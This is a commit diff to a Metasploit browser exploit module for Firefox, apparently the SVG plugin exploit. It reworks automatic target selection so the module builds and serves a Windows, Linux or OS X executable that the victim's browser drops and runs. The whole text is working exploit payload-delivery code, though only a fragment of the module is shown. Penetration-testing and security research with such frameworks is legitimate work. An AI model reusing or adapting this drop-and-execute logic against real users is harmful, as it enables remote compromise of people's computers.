Fix automatic payload selection

2013-05-22 22:37:18 -05:00 · 2013-05-22 22:37:18 -05:00 · 67861794f6
parent 23fe3146dc
commit 67861794f6
1 changed files with 25 additions and 8 deletions
--- a/modules/exploits/multi/browser/firefox_svg_plugin.rb
+++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@ -33,12 +33,15 @@ class Metasploit3 < Msf::Exploit::Remote
 				with script access should be able to trigger it.
 			},
 			'License'        => MSF_LICENSE,
-			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Automatic', {} ],
-					[
-					'Windows x86 (Native Payload)',
+					[ 'Automatic',
+						{
+							'Platform' => ['win', 'linux', 'osx'],
+							'Arch'     => ARCH_X86
+						}
+					],
+					[ 'Windows x86 (Native Payload)',
 						{
 							'Platform' => 'win',
 							'Arch' => ARCH_X86
@ -61,7 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Author'         =>
 				[
 					'Marius Mlynski', # discovery & bug report
-					'joev'            # metasploit module
+					'joev',           # metasploit module
+					'sinn3r'          # metasploit fu
 				],
 			'References'     =>
 				[
@ -98,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		elsif request.uri =~ /\.bin/
 			# send the binary payload to drop & exec
 			print_status("Child frame navigated. Sending binary payload to drop & execute.")
-			send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' })
+			send_response(cli, dropped_file_contents(cli, target), { 'Content-Type' => 'application/octet-stream' })
 		else
 			# send initial HTML page
 			print_status("Target selected: #{target.name}")
@ -109,9 +113,22 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	# @return [String] the encoded executable for dropping onto the client's machine
-	def dropped_file_contents(cli)
+	def dropped_file_contents(cli, target)
 		return if ((p=regenerate_payload(cli)) == nil)
-		generate_payload_exe( {:code=>p.encoded} )
+		opts = target.opts
+		exe = ''
+
+		case target.name
+		when /windows/i
+			opts = opts.merge({:code=>p.encoded})
+			exe = generate_payload_exe(opts)
+		when /linux/i
+			exe = Msf::Util::EXE.to_linux_x86_elf(framework, p.encoded, opts)
+		when /os x/i
+			exe = Msf::Util::EXE.to_osx_x86_macho(framework, p.encoded, opts)
+		end
+
+		return exe
 	end

 	# @return [Msf::Module::Target] that matches the client's user-agent header